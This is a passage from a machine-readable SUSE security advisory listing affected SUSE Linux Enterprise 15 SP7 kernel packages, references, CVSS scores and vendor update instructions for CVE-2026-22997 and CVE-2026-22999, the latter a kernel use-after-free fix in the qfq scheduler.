"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22997",
"url": "https://www.suse.com/security/cve/CVE-2026-22997"
},
{
"category": "external",
"summary": "SUSE Bug 1257202 for CVE-2026-22997",
"url": "https://bugzilla.suse.com/1257202"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-11T14:05:07Z",
"details": "moderate"
}
],
"title": "CVE-2026-22997"
},
{
"cve": "CVE-2026-22999",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-22999"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sched: sch_qfq: do not free existing class in qfq_change_class()\n\nFixes qfq_change_class() error case.\n\ncl-\u003eqdisc and cl should only be freed if a new class and qdisc\nwere allocated, or we risk various UAF.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-livepatch-6_4_0-150700_53_31-default-1-150700.15.3.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-64kb-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-base-6.4.0-150700.53.31.1.150700.17.21.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-default-devel-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-devel-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-macros-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Basesystem 15 SP7:kernel-zfcpdump-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-docs-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-obs-build-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-source-6.4.0-150700.53.31.1.noarch",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Development Tools 15 SP7:kernel-syms-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Module for Legacy 15 SP7:reiserfs-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Workstation Extension 15 SP7:kernel-default-extra-6.4.0-150700.53.31.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-22999",
"url": "https://www.suse.com/security/cve/CVE-2026-22999"
},
{
"category": "external",
"summary": "SUSE Bug 1257236 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257236"
},
{
"category": "external",
"summary": "SUSE Bug 1257238 for CVE-2026-22999",
"url": "https://bugzilla.suse.com/1257238"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:cluster-md-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:dlm-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:gfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.aarch64",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise High Availability Extension 15 SP7:ocfs2-kmp-default-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-6.4.0-150700.53.31.1.x86_64",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.ppc64le",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.s390x",
"SUSE Linux Enterprise Live Patching 15 SP7:kernel-default-livepatch-devel-6.4.0-150700.53.31.1.x86_64",
